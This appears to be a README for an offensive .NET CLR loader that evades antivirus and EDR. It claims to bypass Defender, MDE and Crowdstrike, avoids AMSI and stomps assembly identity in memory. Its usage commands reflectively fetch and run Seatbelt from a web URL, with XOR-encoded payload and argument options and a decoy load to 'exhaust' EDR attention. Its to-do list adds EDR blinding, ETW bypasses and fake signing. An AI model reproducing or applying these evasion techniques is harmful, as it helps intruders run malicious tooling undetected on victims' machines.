Documentation and usage coming (grep around for params). Leverages load_2 overload for deprecated CorRuntime interface to avoid loading AMSI per https://github.com/passthehashbrowns/Being-A-Good-CLR-Host. Comes with some shitty guard rails and anti emulation as well as a native .NET Data Directory metadata parser for lazy identity stomping.
Clears Defender, MDE and Crowdstrike as of writing.
load something from disk
CLRHost.exe -d -a C:\Windows\Temp\benign.exe
exhaust EDR/AV attention by loading an embedded benign binary (requires baking in a RCDATA resource pointing to an assembly). can also set appropriate --exhaust params and point it to a disk or web reflected assembly.
CLRHost.exe -d -a C:\Windows\Temp\benign.exe --exhaust-embedded
list methods in assembly
CLRHost.exe -d -a C:\Windows\Temp\benign.exe --list-methods
reflectively load from web with arg string and stomp identity in memory
CLRHost.exe -w -a https://github.com/Flangvik/SharpCollection/raw/refs/heads/master/NetFramework_4.0_x64/Seatbelt.exe --verbose -p "LocalUsers" --stomp-identity
same as above but for xor encoded (with repeating mask) payload
CLRHost.exe --xor --key some_key_here -w -a https://github.com/Flangvik/SharpCollection/raw/refs/heads/master/NetFramework_4.0_x64/Seatbelt.exe --verbose -p "LocalUsers" --stomp-identity
same as above but we also mask params
CLRHost.exe --param-xor --param-key testmask --xor --key testmask -w -a HBEHBB5bXEQTDAccGANdCBsIXDIBAB0MAgwYWz4JEhkEJhwYAQQQHx0KHVsfAAREBgAVB0IJFgoQFlwZDBIHDgZKPREZJwEKGQAEGx8KLF9aVSwMW1VcOBEEBxYIDQdFER0W --verbose -p OAoQFQE0AA4GFg== --stomp-identity
- better parameter parsing to allow calling non string array methods when using --invoke-member
- interactive mode so that app domain doesn't get torn down and we can keep loading stuff. could be useful for loading system GAC assemblies then manipulating them ala powershell .NET tradecraft
- add optional compile time includes for EDR blinding (loud and softer ones like WFP abuse), patchless ETW bypasses etc
- verify and fix some probable index width sizing errors with metadata stream parsing when ID stomping
- if im bothered migrate it out to classes so its not an unmaintainable codebase monster
- fake sign the binary?